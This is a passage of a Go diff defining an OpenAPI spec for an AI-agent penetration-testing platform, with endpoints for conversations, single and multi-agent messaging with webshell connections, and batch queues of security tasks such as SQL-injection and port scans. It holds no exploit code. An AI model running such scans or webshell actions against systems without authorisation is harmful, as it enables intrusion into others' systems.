"错误信息(如果执行失败)", + "properties": map[string]interface{}{ + "code": map[string]interface{}{ + "type": "integer", + "description": "错误代码", + "example": -32600, + }, + "message": map[string]interface{}{ + "type": "string", + "description": "错误消息", + "example": "Invalid Request", + }, + "data": map[string]interface{}{ + "description": "错误详情(可选)", + }, + }, + }, + "jsonrpc": map[string]interface{}{ + "type": "string", + "description": "JSON-RPC版本", + "example": "2.0", + }, + }, + }, + }, + }, + "security": []map[string]interface{}{ + { + "bearerAuth": []string{}, + }, + }, + "paths": map[string]interface{}{ + "/api/auth/login": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"认证"}, + "summary": "用户登录", + "description": "使用密码登录获取认证Token", + "operationId": "login", + "security": []map[string]interface{}{}, + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/LoginRequest", + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "登录成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/LoginResponse", + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "密码错误", + }, + }, + }, + }, + "/api/auth/logout": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"认证"}, + "summary": "用户登出", + "description": "登出当前会话,使Token失效", + "operationId": "logout", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "登出成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "message": map[string]interface{}{ + "type": "string", + "example": "已退出登录", + }, + }, + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/auth/change-password": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"认证"}, + "summary": "修改密码", + "description": "修改登录密码,修改后所有会话将失效", + "operationId": "changePassword", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/ChangePasswordRequest", + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "密码修改成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "message": map[string]interface{}{ + "type": "string", + "example": "密码已更新,请使用新密码重新登录", + }, + }, + }, + }, + }, + }, + "400": map[string]interface{}{ + "description": "请求参数错误", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/auth/validate": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"认证"}, + "summary": "验证Token", + "description": "验证当前Token是否有效", + "operationId": "validateToken", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "Token有效", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "token": map[string]interface{}{ + "type": "string", + "description": "Token", + }, + "expires_at": map[string]interface{}{ + "type": "string", + "format": "date-time", + "description": "过期时间", + }, + }, + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "Token无效或已过期", + }, + }, + }, + }, + "/api/conversations": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"对话管理"}, + "summary": "创建对话", + "description": "创建一个新的安全测试对话。\n**重要说明**:\n- ✅ 创建的对话会**立即保存到数据库**\n- ✅ 前端页面会**自动刷新**显示新对话\n- ✅ 与前端创建的对话**完全一致**\n**创建对话的两种方式**:\n**方式1(推荐):** 直接使用 `/api/eino-agent` 发送消息,**不提供** `conversationId` 参数,系统会自动创建新对话并发送消息。这是最简单的方式,一步完成创建和发送。\n**方式2:** 先调用此端点创建空对话,然后使用返回的 `conversationId` 调用 `/api/eino-agent` 发送消息。适用于需要先创建对话,稍后再发送消息的场景。\n**示例**:\n```json\n{\n \"title\": \"Web应用安全测试\"\n}\n```", + "operationId": "createConversation", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/CreateConversationRequest", + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "对话创建成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/Conversation", + }, + }, + }, + }, + "400": map[string]interface{}{ + "description": "请求参数错误", + }, + "401": map[string]interface{}{ + "description": "未授权,需要有效的Token", + }, + "500": map[string]interface{}{ + "description": "服务器内部错误", + }, + }, + }, + "get": map[string]interface{}{ + "tags": []string{"对话管理"}, + "summary": "列出对话", + "description": "获取对话列表,支持分页和搜索", + "operationId": "listConversations", + "parameters": []map[string]interface{}{ + { + "name": "limit", + "in": "query", + "required": false, + "description": "返回数量限制", + "schema": map[string]interface{}{ + "type": "integer", + "default": 50, + "minimum": 1, + "maximum": 100, + }, + }, + { + "name": "offset", + "in": "query", + "required": false, + "description": "偏移量", + "schema": map[string]interface{}{ + "type": "integer", + "default": 0, + "minimum": 0, + }, + }, + { + "name": "search", + "in": "query", + "required": false, + "description": "搜索关键词", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "array", + "items": map[string]interface{}{ + "$ref": "#/components/schemas/Conversation", + }, + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权,需要有效的Token", + }, + }, + }, + }, + "/api/conversations/{id}": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"对话管理"}, + "summary": "查看对话详情", + "description": "获取指定对话的详细信息,包括对话信息和消息列表", + "operationId": "getConversation", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "对话ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/ConversationDetail", + }, + }, + }, + }, + "404": map[string]interface{}{ + "description": "对话不存在", + }, + "401": map[string]interface{}{ + "description": "未授权,需要有效的Token", + }, + }, + }, + "put": map[string]interface{}{ + "tags": []string{"对话管理"}, + "summary": "更新对话", + "description": "更新对话标题", + "operationId": "updateConversation", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "对话ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/UpdateConversationRequest", + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "更新成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/Conversation", + }, + }, + }, + }, + "400": map[string]interface{}{ + "description": "请求参数错误", + }, + "404": map[string]interface{}{ + "description": "对话不存在", + }, + "401": map[string]interface{}{ + "description": "未授权,需要有效的Token", + }, + }, + }, + "delete": map[string]interface{}{ + "tags": []string{"对话管理"}, + "summary": "删除对话", + "description": "删除指定的对话及其会话数据(消息、攻击链等)。**漏洞记录会保留**,仅解除与会话的关联。**此操作不可恢复**。", + "operationId": "deleteConversation", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "对话ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "删除成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "message": map[string]interface{}{ + "type": "string", + "description": "成功消息", + "example": "删除成功", + }, + }, + }, + }, + }, + }, + "404": map[string]interface{}{ + "description": "对话不存在", + }, + "401": map[string]interface{}{ + "description": "未授权,需要有效的Token", + }, + "500": map[string]interface{}{ + "description": "服务器内部错误", + }, + }, + }, + }, + "/api/conversations/{id}/project": map[string]interface{}{ + "put": map[string]interface{}{ + "tags": []string{"对话管理"}, + "summary": "设置对话所属项目", + "description": "绑定或解除对话与项目的关联,用于共享事实黑板", + "operationId": "setConversationProject", + "parameters": []map[string]interface{}{ + { + "name": "id", "in": "path", "required": true, + "description": "对话ID", + "schema": map[string]interface{}{"type": "string"}, + }, + }, + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/SetConversationProjectRequest", + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{"description": "设置成功"}, + "400": map[string]interface{}{"description": "项目不存在或参数错误"}, + "404": map[string]interface{}{"description": "对话不存在"}, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + "/api/conversations/{id}/results": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"对话管理"}, + "summary": "获取对话结果", + "description": "获取指定对话的执行结果,包括消息、漏洞信息和执行结果", + "operationId": "getConversationResults", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "对话ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/ConversationResults", + }, + }, + }, + }, + "404": map[string]interface{}{ + "description": "对话不存在或结果不存在", + }, + "401": map[string]interface{}{ + "description": "未授权,需要有效的Token", + }, + }, + }, + }, + "/api/eino-agent": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"对话交互"}, + "summary": "发送消息并获取 AI 回复(Eino ADK 单代理,非流式)", + "description": "向 AI 发送消息并获取回复(非流式)。由 **CloudWeGo Eino** `adk.NewChatModelAgent` + `adk.NewRunner.Run` 执行单代理 MCP 工具链。**不依赖** `multi_agent.enabled`;`multi_agent.eino_skills` / `eino_middleware` 等与多代理主代理一致时可生效。支持 `webshellConnectionId`、角色与附件。", + "operationId": "sendMessageEinoSingleAgent", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "message": map[string]interface{}{"type": "string"}, + "conversationId": map[string]interface{}{"type": "string"}, + "role": map[string]interface{}{"type": "string"}, + "webshellConnectionId": map[string]interface{}{"type": "string"}, + }, + "required": []string{"message"}, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{"description": "成功,响应格式同 /api/eino-agent"}, + "400": map[string]interface{}{"description": "参数错误"}, + "401": map[string]interface{}{"description": "未授权"}, + "500": map[string]interface{}{"description": "执行失败"}, + }, + }, + }, + "/api/eino-agent/stream": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"对话交互"}, + "summary": "发送消息并获取 AI 回复(Eino ADK 单代理,SSE)", + "description": "向 AI 发送消息并获取流式回复(SSE)。由 Eino **单代理** ADK 执行;事件类型与多代理流式一致(含 `tool_call` / `response_delta` / `thinking` 等)。**不依赖** `multi_agent.enabled`。", + "operationId": "sendMessageEinoSingleAgentStream", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "message": map[string]interface{}{"type": "string"}, + "conversationId": map[string]interface{}{"type": "string"}, + "role": map[string]interface{}{"type": "string"}, + "webshellConnectionId": map[string]interface{}{"type": "string"}, + }, + "required": []string{"message"}, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "text/event-stream(SSE)", + "content": map[string]interface{}{ + "text/event-stream": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "string", + "description": "SSE 流", + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + "/api/multi-agent": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"对话交互"}, + "summary": "发送消息并获取 AI 回复(Eino 多代理,非流式)", + "description": "与 `POST /api/eino-agent` 请求体相同,但由 **CloudWeGo Eino** 多代理执行。编排由请求体 `orchestration`(`deep` | `plan_execute` | `supervisor`)指定,缺省为 `deep`。**前提**:`multi_agent.enabled: true`;未启用时返回 404 JSON。支持 `webshellConnectionId`。", + "operationId": "sendMessageMultiAgent", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "message": map[string]interface{}{ + "type": "string", + "description": "要发送的消息(必需)", + }, + "conversationId": map[string]interface{}{ + "type": "string", + "description": "对话 ID(可选,不提供则新建)", + }, + "role": map[string]interface{}{ + "type": "string", + "description": "角色名称(可选)", + }, + "webshellConnectionId": map[string]interface{}{ + "type": "string", + "description": "WebShell 连接 ID(可选,与 Eino 单/多代理流式行为一致)", + }, + "orchestration": map[string]interface{}{ + "type": "string", + "description": "Eino 预置编排:deep | plan_execute | supervisor;缺省 deep", + "enum": []string{"deep", "plan_execute", "supervisor"}, + }, + }, + "required": []string{"message"}, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "成功,响应格式同 /api/eino-agent", + }, + "400": map[string]interface{}{"description": "参数错误"}, + "401": map[string]interface{}{"description": "未授权"}, + "404": map[string]interface{}{"description": "多代理未启用或对话不存在"}, + "500": map[string]interface{}{"description": "执行失败"}, + }, + }, + }, + "/api/multi-agent/stream": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"对话交互"}, + "summary": "发送消息并获取 AI 回复(Eino 多代理,SSE)", + "description": "与 `POST /api/eino-agent/stream` 类似;由 Eino 多代理执行。`orchestration` 指定 deep / plan_execute / supervisor,缺省 deep。**前提**:`multi_agent.enabled: true`;未启用时 SSE 内首条为 `type: error` 后接 `done`。支持 `webshellConnectionId`。", + "operationId": "sendMessageMultiAgentStream", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "message": map[string]interface{}{"type": "string"}, + "conversationId": map[string]interface{}{"type": "string"}, + "role": map[string]interface{}{"type": "string"}, + "webshellConnectionId": map[string]interface{}{"type": "string"}, + "orchestration": map[string]interface{}{ + "type": "string", + "description": "deep | plan_execute | supervisor;缺省 deep", + "enum": []string{"deep", "plan_execute", "supervisor"}, + }, + }, + "required": []string{"message"}, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "text/event-stream(SSE)", + "content": map[string]interface{}{ + "text/event-stream": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "string", + "description": "SSE 流", + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + "/api/agent-loop/cancel": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"对话交互"}, + "summary": "取消任务", + "description": "取消正在执行的Agent Loop任务", + "operationId": "cancelAgentLoop", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/CancelAgentLoopRequest", + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "取消请求已提交", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "status": map[string]interface{}{ + "type": "string", + "example": "cancelling", + }, + "conversationId": map[string]interface{}{ + "type": "string", + "description": "对话ID", + }, + "message": map[string]interface{}{ + "type": "string", + "example": "已提交取消请求,任务将在当前步骤完成后停止。", + }, + }, + }, + }, + }, + }, + "404": map[string]interface{}{ + "description": "未找到正在执行的任务", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/agent-loop/tasks": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"对话交互"}, + "summary": "列出运行中的任务", + "description": "获取所有正在运行的Agent Loop任务", + "operationId": "listAgentTasks", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "tasks": map[string]interface{}{ + "type": "array", + "description": "任务列表", + "items": map[string]interface{}{ + "$ref": "#/components/schemas/AgentTask", + }, + }, + }, + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/agent-loop/tasks/completed": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"对话交互"}, + "summary": "列出已完成的任务", + "description": "获取最近完成的Agent Loop任务历史", + "operationId": "listCompletedTasks", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "tasks": map[string]interface{}{ + "type": "array", + "description": "已完成任务列表", + "items": map[string]interface{}{ + "$ref": "#/components/schemas/AgentTask", + }, + }, + }, + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/batch-tasks": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"批量任务"}, + "summary": "创建批量任务队列", + "description": "创建一个批量任务队列,包含多个任务", + "operationId": "createBatchQueue", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/BatchTaskRequest", + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "创建成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "queueId": map[string]interface{}{ + "type": "string", + "description": "队列ID", + }, + "queue": map[string]interface{}{ + "$ref": "#/components/schemas/BatchQueue", + }, + "started": map[string]interface{}{ + "type": "boolean", + "description": "是否已立即启动执行", + }, + }, + }, + }, + }, + }, + "400": map[string]interface{}{ + "description": "请求参数错误", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "get": map[string]interface{}{ + "tags": []string{"批量任务"}, + "summary": "列出批量任务队列", + "description": "获取所有批量任务队列", + "operationId": "listBatchQueues", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "queues": map[string]interface{}{ + "type": "array", + "description": "队列列表", + "items": map[string]interface{}{ + "$ref": "#/components/schemas/BatchQueue", + }, + }, + }, + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/batch-tasks/{queueId}": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"批量任务"}, + "summary": "获取批量任务队列", + "description": "获取指定批量任务队列的详细信息", + "operationId": "getBatchQueue", + "parameters": []map[string]interface{}{ + { + "name": "queueId", + "in": "path", + "required": true, + "description": "队列ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/BatchQueue", + }, + }, + }, + }, + "404": map[string]interface{}{ + "description": "队列不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "delete": map[string]interface{}{ + "tags": []string{"批量任务"}, + "summary": "删除批量任务队列", + "description": "删除指定的批量任务队列", + "operationId": "deleteBatchQueue", + "parameters": []map[string]interface{}{ + { + "name": "queueId", + "in": "path", + "required": true, + "description": "队列ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "删除成功", + }, + "404": map[string]interface{}{ + "description": "队列不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/batch-tasks/{queueId}/start": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"批量任务"}, + "summary": "启动批量任务队列", + "description": "开始执行批量任务队列中的任务", + "operationId": "startBatchQueue", + "parameters": []map[string]interface{}{ + { + "name": "queueId", + "in": "path", + "required": true, + "description": "队列ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "启动成功", + }, + "404": map[string]interface{}{ + "description": "队列不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/batch-tasks/{queueId}/pause": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"批量任务"}, + "summary": "暂停批量任务队列", + "description": "暂停正在执行的批量任务队列", + "operationId": "pauseBatchQueue", + "parameters": []map[string]interface{}{ + { + "name": "queueId", + "in": "path", + "required": true, + "description": "队列ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "暂停成功", + }, + "404": map[string]interface{}{ + "description": "队列不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/batch-tasks/{queueId}/tasks": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"批量任务"}, + "summary": "添加任务到队列", + "description": "向批量任务队列添加新任务。任务会添加到队列末尾,按照队列顺序依次执行。每个任务会创建一个独立的对话,支持完整的状态跟踪。\n**任务格式**:\n任务内容是一个字符串,描述要执行的安全测试任务。例如:\n- \"扫描 http://example.com 的SQL注入漏洞\"\n- \"对 192.168.1.1 进行端口扫描\"\n- \"检测 https://target.com 的XSS漏洞\"\n**使用示例**:\n```json\n{\n \"task\": \"扫描 http://example.com 的SQL注入漏洞\"\n}\n```", + "operationId": "addBatchTask", + "parameters": []map[string]interface{}{ + { + "name": "queueId", + "in": "path", + "required": true, + "description": "队列ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"task"}, + "properties": map[string]interface{}{ + "task": map[string]interface{}{ + "type": "string", + "description": "任务内容,描述要执行的安全测试任务(必需)", + "example": "扫描 http://example.com 的SQL注入漏洞", + }, + }, + }, + "examples": map[string]interface{}{ + "sqlInjection": map[string]interface{}{ + "summary": "SQL注入扫描", + "description": "扫描目标网站的SQL注入漏洞", + "value": map[string]interface{}{ + "task": "扫描 http://example.com 的SQL注入漏洞", + }, + }, + "portScan": map[string]interface{}{ + "summary": "端口扫描", + "description": "对目标IP进行端口扫描", + "value": map[string]interface{}{ + "task": "对 192.168.1.1 进行端口扫描", + }, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "添加成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "taskId": map[string]interface{}{ + "type": "string", + "description": "新添加的任务ID", + }, + "message": map[string]interface{}{ + "type": "string", + "description": "成功消息", + "example": "任务已添加到队列", + }, + }, + }, + }, + }, + }, + "400": map[string]interface{}{ + "description": "请求参数错误(如task为空)", + }, + "404": map[string]interface{}{ + "description": "队列不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/batch-tasks/{queueId}/tasks/{taskId}": map[string]interface{}{ + "put": map[string]interface{}{ + "tags": []string{"批量任务"}, + "summary": "更新批量任务", + "description": "更新批量任务队列中的指定任务", + "operationId": "updateBatchTask", + "parameters": []map[string]interface{}{ + { + "name": "queueId", + "in": "path", + "required": true, + "description": "队列ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + { + "name": "taskId", + "in": "path", + "required": true, + "description": "任务ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "task": map[string]interface{}{ + "type": "string", + "description": "任务内容", + }, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "更新成功", + }, + "404": map[string]interface{}{ + "description": "任务不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "delete": map[string]interface{}{ + "tags": []string{"批量任务"}, + "summary": "删除批量任务", + "description": "从批量任务队列中删除指定任务", + "operationId": "deleteBatchTask", + "parameters": []map[string]interface{}{ + { + "name": "queueId", + "in": "path", + "required": true, + "description": "队列ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + { + "name": "taskId", + "in": "path", + "required": true, + "description": "任务ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "删除成功", + }, + "404": map[string]interface{}{ + "description": "任务不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/groups": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"对话分组"}, + "summary": "创建分组", + "description": "创建一个新的对话分组", + "operationId": "createGroup", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/CreateGroupRequest", + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "创建成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/Group", + }, + }, + }, + }, + "400": map[string]interface{}{ + "description": "请求参数错误或分组名称已存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "get": map[string]interface{}{ + "tags": []string{"对话分组"}, + "summary": "列出分组", + "description": "获取所有对话分组", + "operationId": "listGroups", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "array", + "items": map[string]interface{}{ + "$ref": "#/components/schemas/Group", + }, + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/groups/{id}": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"对话分组"}, + "summary": "获取分组", + "description": "获取指定分组的详细信息", + "operationId": "getGroup", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "分组ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/Group", + }, + }, + }, + }, + "404": map[string]interface{}{ + "description": "分组不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "put": map[string]interface{}{ + "tags": []string{"对话分组"}, + "summary": "更新分组", + "description": "更新分组信息", + "operationId": "updateGroup", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "分组ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/UpdateGroupRequest", + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "更新成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/Group", + }, + }, + }, + }, + "400": map[string]interface{}{ + "description": "请求参数错误或分组名称已存在", + }, + "404": map[string]interface{}{ + "description": "分组不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "delete": map[string]interface{}{ + "tags": []string{"对话分组"}, + "summary": "删除分组", + "description": "删除指定分组", + "operationId": "deleteGroup", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "分组ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "删除成功", + }, + "404": map[string]interface{}{ + "description": "分组不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/groups/{id}/conversations": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"对话分组"}, + "summary": "获取分组中的对话", + "description": "获取指定分组中的所有对话", + "operationId": "getGroupConversations", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "分组ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "array", + "items": map[string]interface{}{ + "$ref": "#/components/schemas/Conversation", + }, + }, + }, + }, + }, + "404": map[string]interface{}{ + "description": "分组不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/groups/conversations": map[string]interface{}{ + "post": 